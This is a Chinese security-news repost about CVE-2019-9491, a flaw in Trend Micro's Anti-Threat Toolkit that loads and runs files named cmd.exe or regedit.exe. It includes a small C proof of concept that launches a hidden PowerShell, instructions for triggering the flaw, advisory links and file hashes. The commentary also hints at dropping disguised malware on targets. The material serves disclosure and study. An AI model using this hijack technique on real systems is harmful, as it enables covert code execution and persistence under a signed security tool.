点击蓝字
关注黑鸟
研究人员发现趋势科技防威胁工具包(ATTK)存在任意代码执行漏洞CVE-2019-9491,攻击者可利用此漏洞在目标Windows系统上运行恶意软件。
由于ATTK是由经过验证的发行方签名的,因此可绕过任何MOTW安全警告,攻击者甚至可以将ATTK作为一种持久性机制。
[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.
将恶意软件命名为cmd.exe或regedit.exe,ATTK将会加载并运行该文件
#include <windows.h>
void main(void){
puts("Trend Micro Anti-Threat Toolkit PWNED!");
puts("Discovery: hyp3rlinx");
puts("CVE-2019-9491\n");
WinExec("powershell", 0);
}
演示视频
POC下载
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
而旧版本应该还可用,以及将cmd.exe或regedit.exe为命名的恶意软件投放到目标设备,也许都收获一份惊喜。(前提是知道目标有装)
顺便推荐一下这哥们的博客,全是他发现的0day漏洞,学习学习。
链接:
http://hyp3rlinx.altervista.org/
attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1
TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f
attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed
点个赞,每日一个威胁情报故事
如有侵权请联系:admin#unsafe.sh